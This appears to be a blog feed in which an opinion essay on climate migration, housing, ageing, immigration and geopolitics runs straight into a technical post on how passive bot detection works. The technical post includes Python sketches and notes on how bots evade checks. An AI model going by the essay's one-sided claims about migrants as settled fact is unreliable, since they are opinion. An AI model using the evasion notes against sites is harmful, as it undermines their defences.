<p>As I write this blog post, I am looking out of an airplane window. Right after take-off, I looked down on a forest close to Cologne/Bonn airport with many patches of <a href="https://ethz.ch/de/news-und-veranstaltungen/eth-news/news/2015/08/borkenkaefer-im-klimawandel.html">rotten and dead trees</a>. A couple of minutes later, with the plane cruising at around 10,000 metres above the ground, it's impossible for me to see a place where humans have not left their mark, where nature has not been touched.</p>
<p>What I observe: Rivers are straightened, forests are cut down, huge cities are everywhere and there is not a single spot without human intervention. Granted, I am flying above Western Europe and the view might be completely different over the vast wilderness of Siberia (namely, I'd see endless <a href="https://www.greenpeace.org/international/story/49171/russia-record-breaking-fires-siberia/">forest fires</a>).</p>
<p>The point I am trying to make is that human progress and the advance of civilization on our planet impose a huge amount of stress on the natural environment.</p>
<p>Resources such as living space, food, water and energy are scarce, while the human population keeps growing. Of course, the growth rate has decreased, and projections expect the human population to peak at the end of the 21st century at around <a href="https://www.pewresearch.org/fact-tank/2019/06/17/worlds-population-is-projected-to-nearly-stop-growing-by-the-end-of-the-century/">10.9 billion people</a>.</p>
<p>Nevertheless, the human greed to own more and more material goods is not going to stop anytime soon. On the contrary, every damn person on this planet wants a car, a house and three vacations by airplane every year. There are roughly 1 billion people from the rich first world who are used to this lifestyle. But at the same time, the first world is deeply afraid of what happens when the other 7 billion catch up (ignoring the fact that this race is already in full swing).</p>
<p>In this blog post, I try to sketch what problems the earth has to overcome in the next 30, 50 and 100 years. While I am fully aware that it is notoriously difficult to make long term projections, I try to give it a naive go here.</p>
<p>In order to have some structure, I divide my essay into the following four sections:</p>
<ol>
<li>Climate Crisis</li>
<li>Globalisation & Economy</li>
<li>Geopolitics & War</li>
<li>Advance of Medicine & Technology</li>
</ol>
<h2>Climate Crisis</h2>
<p>It's relatively easy to prove that there is more CO2 in the atmosphere due to human influence. Carbon that originates from fossil fuels (and thus from the ground) is <a href="https://royalsociety.org/topics-policy/projects/climate-change-evidence-causes/basics-of-climate-change/">depleted in natural radioactive Carbon-14</a>, because the half-life of Carbon-14, roughly 5730 years, is short compared to the millions of years the fuels spent underground. Put differently, if we measure the share of CO2 molecules in the atmosphere without a radioactive Carbon-14 atom, we can observe the effect of human-produced fossil fuel emissions.</p>
<p>The question whether this increase in carbon dioxide and methane emissions also causes the climate crisis is harder to answer. But even if the climate change theory is just a theory and we give the deniers the benefit of the doubt (after all, it's hard to prove that the climate crisis is fully man-made), it's an undeniable fact that the earth is heating up at an alarming pace.</p>
<figure>
<img src="https://incolumitas.com/images/agreement_gis_2019.gif" alt="climateChangeTemp" />
<figcaption>The Earth is heating up
<span style="font-size: 60%">(Source: <a href="https://earthobservatory.nasa.gov/world-of-change/global-temperatures">https://earthobservatory.nasa.gov/world-of-change/global-temperatures</a>)</span>
</figcaption>
</figure>
<p>This increase in temperature causes a myriad of primary problems:</p>
<ol>
<li>Heat waves and the suffering of humans under heat domes and subsequent wild fires</li>
<li>The melting of glaciers and of the ice at the North Pole and in Antarctica</li>
<li>Huge wildfires such as the ones <a href="https://en.wikipedia.org/wiki/2021_Russia_wildfires">from 2021 in Russia/Siberia</a> which in turn increase the emission of CO2</li>
<li>Other extreme weather events such as floods, hurricanes, storms, ...</li>
<li>The increase of the sea level and the endangerment of countries whose territories are close to the sea level</li>
</ol>
<p>The past has shown that many countries on the planet have very little means to protect their population from climate disasters. Most recently, tropical storms and earthquakes (Earthquakes are no consequence of climate-change of course) in Haiti caused <a href="https://www.theguardian.com/global-development/2021/sep/18/haiti-migrants-us-texas-violence">many thousand climate refugees</a> that are headed to the US border, even though the US under the Biden administration is reluctant to allow any refugee to enter the country.</p>
<p>Projections show that we have to expect millions of climate refugees from the southern hemisphere pushing into northern countries. On Sept. 13, 2021, the <a href="https://www.worldbank.org/en/news/press-release/2021/09/13/climate-change-could-force-216-million-people-to-migrate-within-their-own-countries-by-2050">updated Groundswell report from the Worldbank</a> predicts that up to 216 million people across six world regions are forced to move due to climate change within their countries. The report states that <em>by 2050, Sub-Saharan Africa could see as many as 86 million internal climate migrants; East Asia and the Pacific, 49 million; South Asia, 40 million; North Africa, 19 million; Latin America, 17 million; and Eastern Europe and Central Asia, 5 million.</em> </p>
<p>As a German, I can say that the Syrian civil war (surely not caused by climate change) and migration for other reasons, which together led to the arrival of <a href="https://de.wikipedia.org/wiki/Liste_der_L%C3%A4nder_nach_gefl%C3%BCchteter_Bev%C3%B6lkerung#L%C3%A4nder_nach_Bestand_an_internationalen_Fl%C3%BCchtlingen">1.5 million</a> refugees in Germany, almost tore German society apart. As a result, the far-right political party AfD emerged and to this day has widespread support in German society (12.6% and 10.3% of voters chose them in the federal elections of 2017 and 2021). It's relatively safe to say that Germany will not overcome another major refugee movement (major = more than 2 million refugees) without civil-war-like violent outbursts.</p>
<p>The same applies to many other <em>rich</em> European countries. Most European societies are very fragile and their relatively high prosperity rests on shaky foundations. We can already see a fortification of the European coastlines, and refugee streams are already used politically by countries such as Turkey. To be fair, Turkey took in the majority of Syrian migrants, around <a href="https://de.wikipedia.org/wiki/Liste_der_L%C3%A4nder_nach_gefl%C3%BCchteter_Bev%C3%B6lkerung#L%C3%A4nder_nach_Bestand_an_internationalen_Fl%C3%BCchtlingen">4 million refugees</a>, so its political pressure on Europe is somewhat understandable in this context.</p>
<p>This raises the question: if the collapse of a relatively small nation such as Syria causes so much trouble in refugee-absorbing nations such as Turkey and Germany, what will happen if entire geographical regions gradually become uninhabitable? Of course this will be a slow and continuous process over the next 50 years, but we can already observe it in certain parts of the world:</p>
<ol>
<li>
<p>The recent heat waves in the summers of 2020 and 2021 on the North American West Coast and the lack of water supply have already motivated quite a few people to pack up and move elsewhere (Montana, for example). The New York Times <a href="https://www.nytimes.com/interactive/2020/09/15/magazine/climate-crisis-migration-america.html">wrote about these anticipated refugee waves in the US</a> last year and predicts <em>that 13 million Americans will be forced to move away from submerged coastlines. Add to that the people contending with wildfires and other risks, and the number of Americans who might move — though difficult to predict precisely — could easily be tens of millions larger.</em></p>
</li>
<li>
<p>In the Sahel zone, the <a href="https://www.worldbank.org/en/news/immersive-story/2020/09/21/where-climate-change-is-reality-supporting-africas-sahel-pastoralists-secure-a-resilient-future">rainy seasons are growing shorter and the dry seasons are getting longer</a>. In 2010, a drought was particularly arduous. It is estimated to have killed more than 4.8 million head of cattle in Niger, roughly 25% of the herd.</p>
</li>
<li>
<p>Climate change in the Caribbean poses a major threat to the islands in the Caribbean. The largest environmental changes are the rise in sea level, stronger hurricanes, longer dry seasons and shorter wet seasons. <a href="https://www.cbsnews.com/news/climate-change-may-make-extreme-hurricane-rainfall-five-times-more-likely-study-says/">Studies said</a> that climate change may make extreme hurricane rainfall 5 times more likely.</p>
</li>
</ol>
<p>It has to be mentioned that it's not scientifically accurate to state that people flee only because of climate change. It's often a complicated mix of socio-economic factors. Natural disasters might only be the last straw. For example, the natural environment of the Gulf nations would be an impossible living environment for an economically weaker civilisation that depends on agriculture and low-level manufacturing.</p>
<p>But it poses no risk to the extremely rich Gulf nations that only export crude oil and oil products and import everything else, including their work-force. But still, it's utter ecological <a href="https://www.youtube.com/watch?v=tJuqe6sre2I">madness to create cities such as Dubai</a> in such inhospitable regions.</p>
<h2>Globalisation & Economy</h2>
<p>We are close to the year 2022 and it's safe to say that our world is thoroughly globalized. Maybe the COVID-19 pandemic slowed globalisation down, but in the big picture, you can barely see the dent the pandemic left in the upwards trend.</p>
<p>I think it's fair to say that it doesn't really matter where you live on this planet if you earn enough money (maybe enough money constitutes an income of more than 50,000 EUR per year). You surely need to exclude both tails of the world's countries - the poorest and richest - because that amount of money will get you nowhere in New York and you most likely don't want to live in Somalia either. But everywhere else, in totally average countries such as Bulgaria, Malaysia, Argentina or Germany, you will be set with that income.</p>
<p>You can have a decent life in a gated community in the Democratic Republic of Congo if you earn 50,000 EUR/year and you can have a shitty life in Germany if you earn 20,000 EUR/year. Of course, Germany might save you from starvation and becoming homeless and the Democratic Republic of Congo won't (I am guessing), but my general point still stands: It mostly doesn't matter where you live on this planet, it only matters how much money you make.</p>
<p>So what will the future economy and workforce look like?</p>
<p>I am convinced that inequality will become even greater in the future. If you come from nothing, it's extremely hard to find a good, high-income job that allows you to build basic wealth. And by basic wealth, I mean the ability to own a decent house and a decent car and the ability to support your family. On the other hand, if you are already wealthy, it's easy to maintain your wealth.</p>
<p>Work won't make you rich. Working merely prevents you from immediate death by starvation and exposure to the elements, but nothing more. In many parts of the Western world, a 40-hour minimum-wage job doesn't even give you enough money to rent a one-bedroom apartment. So those jobs are designed to be done by people who don't have to pay rent, or if they have to, they will need to work 3 of those minimum-wage jobs just to have a roof over their heads. It's utter madness.</p>
<p>If you want to become wealthy in the 21st century, you have to do one of the following:</p>
<ol>
<li>Be already wealthy</li>
<li>Inherit wealth</li>
<li>Be extremely smart/talented AND lucky and become rich by yourself with start-up ideas, art, music, sports, fashion, ...</li>
</ol>
<p>For example, if you own real estate and stocks, your assets have more than doubled in the past couple of years. For Millennials such as me, even though I have a relatively good job, it's utterly impossible to buy a normal house. A normal house costs 700,000 EUR where I live (Cologne / Germany). Those exact houses cost 200,000 EUR ten years ago. How are you supposed to compete with those rising prices? All you can do as a person in that situation is to hope for an economic crash like the one from 2009.</p>
<p><a href="https://old.reddit.com/r/wallstreetbets/comments/q0omot/mortgage_payments_havent_been_this_unaffordable/hfa6mxy/">I_love_boobs86</a> writes on <a href="https://old.reddit.com/r/wallstreetbets/comments/q0omot/mortgage_payments_havent_been_this_unaffordable/hfa6mxy/">r/wallstreetbets</a>:</p>
<blockquote>
<p>35 year old Los Angeles resident here, I just barely squeaked in on a $790k house in 2019 and I was only able to get it because I was the first one there and put in an offer quickly (the seller’s agent and seller had a falling out so no other buyers were considered). </p>
<p>I’m still renovating it, house is and was a complete disaster. I’ve had to redo the entire house from the roof all the way down to the plumbing and everything in between. $100k+ deep now and still going. My mortgage payment is $3,600/month all in but I have a tenant that gives me $1,500 rent so that helps. Even in these two years, I can sell this house for $1.3m easy. It’s fucking madness out there.</p>
</blockquote>
<p>For example, I am currently 30 years old, and if I wanted to buy a normal house for 700,000 EUR, I would need to work for another 60 years to pay it off. I would have cleared my debt at the ripe age of 90. And that's not going to happen.</p>
<p>Sure, some people did risk it and bought those houses with a small down payment and a huge mortgage and ended up with houses that doubled in price in the past 3-5 years, but for me, it does not make sense to get massively into debt for a house that has increased massively in price. Of course, interest rates are extremely low right now and inflation is relatively high, so future debt is worth much less. But I am still hesitant.</p>
<p>I mean, just have a look at the house price index in Germany:</p>
<figure>
<img src="https://incolumitas.com/images/germany-housing-index.png" alt="housePrice" />
<figcaption>Housing Prices <span style="font-size: 60%">(Source: <a href="https://tradingeconomics.com/germany/housing-index">https://tradingeconomics.com/germany/housing-index</a>)</span></figcaption>
</figure>
<p>Does this look normal to you? The prices are increasing more and more.</p>
<p>So far, the only strategy I have come up with is to move away from Germany to a place with cheaper rent and lower taxes, such as Eastern Europe / Turkey / South America / South East Asia. I can always come back to Germany (or other parts of the Western world) when the baby boomers start to die off (which will start to accelerate in the late 2020s and early 2030s).</p>
<p>Of course I could also relocate to a more affordable region in the German East or countryside in order to save rent costs. But honestly, the German countryside does feel more alien to me than a city such as Bangkok or Buenos Aires.</p>
<p>Of course, when I move to a more affordable region of the world and keep working remotely for companies in the rich West & North, I will be responsible for prices going up for locals. So instead of me getting fucked over in Germany, I will be the one that fucks over the local people. But in this capitalistic hell hole of a planet, that's all you can do anyhow.</p>
<p>There seems to be a general trend in the world: </p>
<p>Everything that has tangible value, such as real estate and stocks, will increase in price. There is a massive fight for resources. Nobody wants to save money, because inflation burns money at an alarming pace.</p>
<p>Another major shift that we are going to see in the next 50 years is the massive aging of our planet's population. For example, Europe is already an extremely old continent age-wise. In 2020, the median age in Western Europe was 44 years, while the median age in Africa was 19.7 years! Germany is the second oldest country in the world with a median age of 47.1 years, right behind Japan with 47.3 years.</p>
<figure>
<img src="https://incolumitas.com/images/Europe_population_over_65.png" alt="europePopulationOver65" />
<figcaption>Percentage of the European Population above 65 years of age.
<span style="font-size: 60%">(Source: <a href="https://commons.wikimedia.org/wiki/File:Europe_population_over_65.png">https://commons.wikimedia.org/wiki/File:Europe_population_over_65.png</a>)</span>
</figcaption>
</figure>
<p>This unstoppable aging of Europe will require massive immigration of young people from other parts of the world to uphold economic growth and prosperity. And this will likely lead to conflicts within the respective societies.</p>
<p>For example in Germany, there were:</p>
<ul>
<li>6 labourers per retiree in the year 1962</li>
<li>2.7 labourers per retiree in the year 1992</li>
<li>2.1 labourers per retiree in the year 2019</li>
</ul>
<p>And this ratio will drop much further in the years to come, because the baby boomer generation will have completely retired by 2030.</p>
<figure>
<img src="https://incolumitas.com/images/alterspyramide.png" alt="altersPyramide" />
<figcaption>Germany is an old country.
<span style="font-size: 60%">(Source: <a href="https://service.destatis.de/bevoelkerungspyramide/index.html#!y=2021">https://service.destatis.de/bevoelkerungspyramide/index.html#!y=2021</a>)</span>
</figcaption>
</figure>
<p>On the other hand, according to a <a href="https://www.bbsr.bund.de/BBSR/DE/startseite/topmeldungen/bevoelkerungsprognose-bbsr-2040.html">recent forecast by the German Federal Institute for Research on Building, Urban Affairs and Spatial Development (BBSR)</a>, Germany will not lose any population and will remain stagnant at around 82 million people until 2040. This is only possible with <a href="https://www.spiegel.de/panorama/gesellschaft/deutschland-bevoelkerung-schrumpft-in-den-naechsten-jahren-aber-nicht-ueberall-a-4f5a7009-9c23-4a0b-9671-48e82defe0b0">massive immigration</a>. Between 2018 and 2040, Germany is predicted to have 17.4 million births but 23.5 million deaths, a deficit of about 6.1 million. So at least 6 million people will have to come to Germany in the next 20 years to keep the population stable. And those migrants won't come from Europe, because every Western European country has the same structural aging issues as Germany, so the migrants will most likely come from Africa, the Middle East and to a lesser extent from the Far East.</p>
<p>Replacing <em>native</em> people with migrants is massively flawed logic in my opinion. The question that needs to be asked is: Why does the German population not have kids anymore? But the federal government just doesn't care and proceeds to blindly import new people into this misery. The economy is supposed to grow, but endless growth is utterly insane. The falling birth rates in the whole world are already a sign of the massive scarcity of resources that we have on this planet. It would be a blessing if Germany lost those 6 million people by the year 2040, as was predicted based on birth rates alone.</p>
<p>But no, the Government had to lure in more workers so the blessed economy does not tank. The logic is: Work, work, work, don't have children, import young workers from outside of Europe that are working hard for no pay. </p>
<p>Personal anecdote and maybe slightly one-sided: During my time in Bonn, I met many hard-working students from India who were studying at the excellent University of Bonn. Those folks were 23 years old and already starting their PhD in machine learning. But not a single person of that calibre planned to stay in Germany. They exclusively wanted to get the cheap and relatively good German education and then relocate to the UK, Australia or the USA to work hard for 3 to 5 years in order to go back to India, start a family and build a home. Smart and hard-working people do not go to Germany. The wages are relatively low, and if you manage to earn 10,000 EUR a month, taxes and health insurance will reduce your net salary to 5,000 EUR.</p>
<p>Everyone talks about this, but it has to be said again: We will have immense troubles obtaining skilled and smart workers from overseas. Or let me rephrase that: We will have massive problems obtaining skilled workers that want to work for low pay.</p>
<h2>Geopolitics & War</h2>
<p>Probably the most remarkable event in the past months was the chaotic retreat of the Western alliance from Afghanistan. NATO forces spent 20 years in this extremely poor country and spent billions of dollars arming the Afghan army for nothing. The Afghan army succumbed to the Taliban in a matter of days. There was nothing but corruption in the Afghan army.</p>
<p>I am not so interested in the specific case of Afghanistan (Rule: Never invade Afghanistan, <a href="https://en.wikipedia.org/wiki/First_Anglo-Afghan_War">ask the Englishmen</a>); I want to discuss what can be concluded in general from this milestone event.</p>
<p>US and NATO interventions are a thing of the past. The US won the Cold War and afterwards intervened with boots on the ground in many countries (Somalia, Iraq, Afghanistan, Kuwait, Haiti, ...), but the war in Afghanistan was probably the last such extensive ground operation. The US will still defend its allies such as Taiwan, but proactive wars like the one in Afghanistan are very unlikely to happen in the next 10 years and beyond.</p>
<p>China did not even try to hide that they were <a href="https://www.nytimes.com/2021/07/28/world/asia/china-taliban-afghanistan.html">talking with the Taliban even before the US retreat</a>. China will gradually take over the majority of economic relations in many countries that were dependent on the Western world until very recently. For the most part, the Western world was feared not because of its military capabilities, but because of the necessity to cooperate economically with Europe & North America. China & Russia constitute an alternative economic sphere to the Western world. The promise that China makes to countries such as Iran, Afghanistan or many African countries is the following:</p>
<blockquote>
<p>"We do not care about your political issues and how you rule your country. We respect your internal affairs. All we want is to create a win-win situation by trading with you and investing in your country. China wants to interact economically with you, we don't have an interest in exporting our ideology or trying to change your ethno-cultural system."</p>
</blockquote>
<p>Whether this promise turns out to be true remains to be seen.</p>
<p>My assumption is that the world will become more multipolar. While it may seem like the world is divided between Europe/US/Oceania/Japan on one side and China/Russia on the other, that classification is way too simple. In the long run, Europe and the United States will lose influence compared to the rest of the world. But not because of a sudden collapse, simply because other nations are catching up in economic prosperity.</p>
<p>In 2050, the US and Europe will still play an important role in the world, but there will be several more or less equal counterparts, such as China, India, Indonesia, Brazil and some parts of Africa.</p>
<p>I don't think that we will see huge geopolitical shifts in the future. China and India simply want to prosper economically; there is no need to risk it all by invading Taiwan, for example. The US will be gradually pushed back in the Pacific Ocean (especially in the East and South China Sea), but this just seems to be a natural correction.</p>
<p>Europe continues to lose influence and the internal weakness of Europe will continue to manifest itself as it did when the second largest economy of Europe, the United Kingdom, left the union. There is a possibility that <a href="https://www.france24.com/en/europe/20210715-on-the-road-to-polexit-poland-pushes-back-in-battle-against-eu-rule">Poland</a> and <a href="https://www.dw.com/en/hungary-vs-eu-is-orban-striving-for-huxit/a-58934527">Hungary</a> will leave next. Turkey will never enter the European Union in the first place.</p>
<p>But do I see any possibility that our current world in 2021 is headed into a major war, such as a third world war?</p>
<p>No, not really. Not at all actually. The only possibility I see is a major conflict between China and the USA, but China will not risk too much, since their only goal is to increase their wealth and living standard even more. </p>
<p>What about North Korea? I don't think so either. North Korea has had the bomb for more than 10 years and nothing has happened so far. In 2019, US President Trump set foot on North Korean territory and shook hands with Kim Jong-un, the pinnacle of a series of <a href="https://en.wikipedia.org/wiki/Kim_Jong-un#Diplomacy_2018%E2%80%932019">favourable diplomatic events</a> between South Korea, North Korea and the US. To be honest, I wouldn't be surprised to see Korea united again by the year 2050.</p>
<h2>Advance of Medicine & Technology</h2>
<p>I am a computer scientist and thus my viewpoint might be a bit uneducated, but I don't think that we will see major technological milestones in the next 10-20 years. By major technological leaps, I mean things such as:</p>
<p>Technological breakthroughs</p>
<ol>
<li>General Artificial Intelligence and <a href="https://en.wikipedia.org/wiki/Technological_singularity">Singularity</a> as a result</li>
<li>Fusion reactors that are economical and don't produce radioactive waste</li>
<li>Quantum computers that can reduce the time complexity for real world algorithmic problems such as integer factorization used in the asymmetric cryptosystem RSA (Shor's algorithm). Another application is unstructured search where the task is to find a marked item out of a list of <code>n</code> items in a database (Grover's algorithm).</li>
</ol>
<p>Medical discoveries / breakthroughs</p>
<ol>
<li>Vastly reducing or entirely stopping the natural aging process</li>
<li>Curing chronic diseases such as cancer, cardiovascular diseases and diabetes (of which the prior discovery is a superset)</li>
<li>Curing and reversing neurological damage after incidents such as strokes, accidents or traumata to the head</li>
<li>Making effective use of genetic engineering technology such as CRISPR gene editing</li>
</ol>
<p>Sure, there are some cool things that have happened recently in medicine or will most likely happen in the near future, such as:</p>
<ol>
<li>
<p>Hepatitis C is now almost <a href="https://www.medicinenet.com/can_hep_c_be_cured_completely/article.htm">completely curable</a> (hepatitis B, by contrast, can so far only be suppressed with medication, not cured). We developed antiviral medication that can eradicate hepatitis C: <em>The "direct-acting" antiviral medications are given over 12 weeks. These are combination medications and will cure early acute hepatitis C in more than 90 percent of people. They are Harvoni (combination of ledipasvir and sofosbuvir) and Viekira Pak (a mix of ombitasvir, paritaprevir, ritonavir and dasabuvir)</em></p>
</li>
<li>
<p>HIV might become curable in the next 10 years. Biontech and Moderna launched several <a href="https://clinicaltrials.gov/ct2/show/NCT05001373">phase 1 trials</a> for mRNA vaccines against HIV. But it has to be said that phase 1 vaccination trials merely mean: <em>Phase 1, Randomized, First-in-human, Open-label Study to Evaluate the Safety and Immunogenicity of eOD-GT8 60mer mRNA Vaccine (mRNA-1644) and Core-g28v2 60mer mRNA Vaccine (mRNA-1644v2-Core) in HIV-1 Uninfected Adults in Good General Health.</em> Put differently: They first want to see whether the vaccine is harmless to HIV <strong>uninfected</strong> individuals and generates the desired immune response, before they investigate whether the vaccine effectively prevents HIV infection in the future.</p>
</li>
<li>
<p>mRNA vaccines against cancer. For example, stage 3 and stage 4 melanoma, a skin cancer that is highly lethal in very late stages, had a <a href="https://www.nature.com/articles/d41586-020-01038-9">typical survival time of only 6 to 7 months in the year 2000</a>. Nowadays, in the year 2021, with the help of immunotherapy and targeted therapy such as checkpoint inhibitors, the same late-stage malignant cancer has a 5-year survival rate between <a href="https://www.curemelanoma.org/about-melanoma/melanoma-staging/melanoma-survival-rates/">22.5% (stage 4) and 63% (stage 3)</a>. That is a huge leap in a short time.</p>
</li>
</ol>
<p>So yes, we will definitely see improvements in treatments for cancer and cardiovascular diseases. However, the very best thing that you can do is to eat healthily, sleep well and go to a medical checkup once every year.</p>
<p>A human life spans roughly 70 to 80 years and your best years will be between the ages of 20 and 60; the future isn't going to change much there.</p>
<p>Regarding consumer technology, I think we have reached the peak. In 2007, the iPhone was introduced, and the revolution that followed led to almost every human owning a small personal computer with all of their information in their pocket. What else is there to come?</p>
<p>I cannot reasonably see any further major technological development that would reach that kind of adoption. Sure, smartphones will get smaller and more powerful, but in the year 2050 we will still have smartphones that we carry in our pocket. They will be lighter, foldable and maybe have some kind of technology to display information in a different format than a screen. But we will still need to carry some kind of device with a CPU, RAM and a networking card.</p>
<p>Cars might become entirely electric, maybe even airplanes. Self driving cars might become a reality on certain roads such as standardized highways, where the traffic can be controlled effectively.</p>On the Architecture of Bot Detection Services2021-07-18T22:58:00+02:002021-07-18T22:58:00+02:00Nikolai Tschachertag:incolumitas.com,2021-07-18:/2021/07/18/on-the-architecture-of-bot-detection-services/<p>There are unique challenges when developing a passive bot detecting system. In this blog article, I explain some of the obstacles that need to be overcome in order to detect advanced bots without presenting a CAPTCHA. I also explain how bot programmers can benefit from the architectural challenges that bot detection systems inherently suffer from.</p><h2>Introduction</h2>
<p>Without ever having developed a fully functional anti bot system myself, I want to investigate some of the obstacles that need to be overcome if I started such a project.</p>
<p>First of all, I have to define the functional specification that such an anti bot system must meet: </p>
<blockquote>
<p>A bot detection system should be able to detect passively (1) that a website visitor (2) is in fact not a human but an automated program (3)</p>
</blockquote>
<p>I deliberately keep my definition very broad.</p>
<ol>
<li>An <strong>automated program</strong> is software not controlled by a human user. Some examples:<ul>
<li>The Google Chrome browser automated with a framework such as <a href="https://github.com/microsoft/playwright">playwright</a> or <a href="https://github.com/puppeteer/puppeteer">puppeteer</a></li>
<li>Simple <code>curl</code> commands orchestrated with shell scripts</li>
<li>Real physical mobile phones running Android automated over <code>adb</code> (Android Debug Bridge) and (optionally) controlled with frameworks such as <a href="https://appium.io/">appium.io</a> or <a href="https://github.com/DeviceFarmer/stf">stf (DeviceFarmer)</a></li>
</ul>
</li>
<li>Likewise, <strong>detecting passively</strong> means: Without actively interrupting the user's (or bot's) browser session by asking to solve a challenge task such as Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> or the newer <a href="https://www.hcaptcha.com/">hCAPTCHA</a>.
Put differently: The decision whether a website visitor is a human or a bot has to be made by passively observing signals such as TCP/IP streams and other data sent from the browser via JavaScript.</li>
<li>And what does <strong>website visitor</strong> mean?
There is a fundamental difference between a website visitor that simply opens a single page before leaving again and a user that performs a complex action such as logging into an online bank and transferring money. In the latter case, a bot detection system has much more time in order to detect a bot. Furthermore, in the latter case, there is also behavioral and intent data, which is completely lacking in the former case.</li>
</ol>
<p>Our attacker model is as follows:</p>
<figure>
<img src="https://incolumitas.com/images/attackerModel.png" alt="attacker model" />
<figcaption>Attacker model of any bot detection service. The red arrows indicate network messages that possibly contain tainted/spoofed data.</figcaption>
</figure>
<p>Some explanatory words regarding the graphic above:</p>
<p>Websites are served by web servers. Every message that the browser (client) sends to the web server has to be considered as potentially spoofed and tainted. This includes network messages created by JavaScript that are dynamically sent over WebSockets or the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">sendBeacon API</a>. This is also the reason why the traffic arrows from the browser to the web server are colored red.</p>
<p>A fundamental property of client/server security is: From the standpoint of the server, no input from clients can be trusted. This will be important in the remainder of this blog post, which is why I repeat it so vehemently here.</p>
<p>So what are actually some methods to passively detect that a browser is not controlled by an organic human?</p>
<p>Actually, signals that fall into the exact binary category of "this visitor is a bot or not" rarely exist.</p>
<p>Rather, anti bot vendors rephrase the question to: On what level can we uniquely identify a browser user and then rate limit her? Because that's <strong>the overall goal of anti bot systems: Rate limiting unique users</strong>.</p>
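<p>To make the rate limiting goal more concrete, here is a minimal sketch of a sliding-window rate limiter in Python. It is only an illustration under my own assumptions: the class name <code>SlidingWindowRateLimiter</code>, the <code>user_key</code> parameter and the chosen limits are hypothetical and not taken from any real anti bot product. The key can be any identifier that is believed to be unique per user.</p>

```python
import time
from collections import defaultdict, deque
from typing import Optional


class SlidingWindowRateLimiter:
    """Allow at most `max_requests` per `window_seconds` for each user key.

    Hypothetical illustration, not the implementation of any real vendor.
    """

    def __init__(self, max_requests: int, window_seconds: float):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        # user key -> timestamps of the requests that are still in the window
        self._hits = defaultdict(deque)

    def allow(self, user_key: str, now: Optional[float] = None) -> bool:
        """Return True if the request may pass, False if it is rate limited."""
        if now is None:
            now = time.monotonic()
        hits = self._hits[user_key]
        # Forget requests that have fallen out of the time window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True


if __name__ == "__main__":
    limiter = SlidingWindowRateLimiter(max_requests=2, window_seconds=10)
    for t in (0.0, 1.0, 2.0):
        print(t, limiter.allow("203.0.113.7", now=t))
```

<p>The hard part is not the counting but the choice of <code>user_key</code>: the better the key identifies one real user, the harder it is for a bot to evade the limit by rotating it.</p>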
<p>Some techniques to identify users:</p>
<ul>
<li>By IP address</li>
<li>By <a href="https://tlsfingerprint.io/">TLS</a> or <a href="https://github.com/NikolaiT/zardaxt">TCP/IP fingerprint</a></li>
<li>By HTTP headers and their order/case sensitivity</li>
<li>By browser fingerprints obtained via JavaScript (Including WebGL fingerprints, audio fingerprints, <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Picasso</a>)</li>
<li>By Cookies/Session ids</li>
</ul>
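<p>As a rough illustration of how some of these signals could be combined, the following Python sketch hashes the order and case of the HTTP header names and joins the result with the IP address and a session id. The function names and the example header lists are made up for this sketch, and real systems presumably use many more signals.</p>

```python
import hashlib
from typing import Sequence


def header_order_fingerprint(header_names: Sequence[str]) -> str:
    """Hash the header names exactly as received (order and case matter)."""
    joined = "\n".join(header_names)
    return hashlib.sha256(joined.encode("utf-8")).hexdigest()[:16]


def visitor_key(ip: str, header_names: Sequence[str], session_id: str = "") -> str:
    """Combine several signals into one identifier (hypothetical scheme)."""
    return "|".join([ip, header_order_fingerprint(header_names), session_id])


if __name__ == "__main__":
    # Invented header orders, only meant to show that the order changes the hash.
    client_a = ["Host", "Connection", "User-Agent", "Accept"]
    client_b = ["Host", "User-Agent", "Accept", "Connection"]
    print(visitor_key("203.0.113.7", client_a))
    print(visitor_key("203.0.113.7", client_b))
```

<p>Two clients behind the same IP address that send their headers in a different order end up with different keys, whereas a bot that copies the header order of a real browser cannot be told apart by this signal alone.</p>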
<p>It should be obvious that the examples from the list above fall into two categories:</p>
<ol>
<li>Signals that are unspoofable due to the design of the Internet, such as IP addresses</li>
<li>Data that clients send to the server, usually via JavaScript, which can be altered by clients at will</li>
</ol>
<p>Of course an attacker can alter her IP address by setting up a proxy server. </p>
<p>Technically, spoofing IP addresses at the IP level will work, but the first router outside your home network will most likely drop the IP packet if it detects that the source IP does not belong to the correct network. And even if that does not happen: How are you ever going to receive a reply to your spoofed IP packet?</p>
<p>With TLS and TCP/IP fingerprinting, it's way easier to spoof those signals on the client side.</p>
<p>On the other hand, all the data that is collected via JavaScript can be spoofed by the client! Usually, anti bot companies collect a wide range of different data with JavaScript:</p>
<ol>
<li>Fingerprinting data mostly from the <code>navigator</code> property</li>
<li>Behavioral data such as mouse movements and touch events or key presses</li>
<li>WebGL fingerprints or audio fingerprints</li>
</ol>
<h2>Architecture of Bot Detection Services</h2>
<p>Let's think about how bot detection services are implemented by following a typical browsing session of a user visiting a website. As discussed above, bot detection systems collect data from both the client side and the server side. In the following section, I will follow a typical browsing session on a very low level and I will explain the different checks that a bot detection system performs at each point along the way.</p>
<p>The very first event relevant for bot detection is the DNS lookup of the hostname to which a browser establishes a connection. The browser uses the operating system's local DNS resolver to look up the <code>A</code> and <code>AAAA</code> DNS resource records of a hostname. Worded differently, it asks for the IPv4 or IPv6 address that corresponds to the hostname used in the URL that was entered in the browser's address bar. The DNS request will be answered by the responsible name server.</p>
<p>During such a lookup, the DNS server can check whether the IP address of the resolver client is the same as, or belongs to the same ISP as, the IP address that communicates with the web server. Put differently, on the DNS server it can be checked that no <a href="https://en.wikipedia.org/wiki/DNS_leak">DNS leak</a> happens. A DNS leak occurs if the DNS traffic is not routed through the proxy/VPN configured in the browser.</p>
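<p>A minimal sketch of such a check could look as follows. It assumes that the DNS lookup and the HTTP connection have already been matched to the same visitor (for example via a unique hostname per visitor, which is my assumption and not part of the description above). The prefix table <code>PREFIX_TO_OPERATOR</code> is a hypothetical stand-in for a real IP to ISP database and uses documentation address ranges.</p>

```python
import ipaddress
from typing import Optional

# Hypothetical prefix -> operator table. A real system would query an
# ASN/ISP database instead. The ranges are reserved documentation networks.
PREFIX_TO_OPERATOR = {
    ipaddress.ip_network("192.0.2.0/24"): "ExampleISP",
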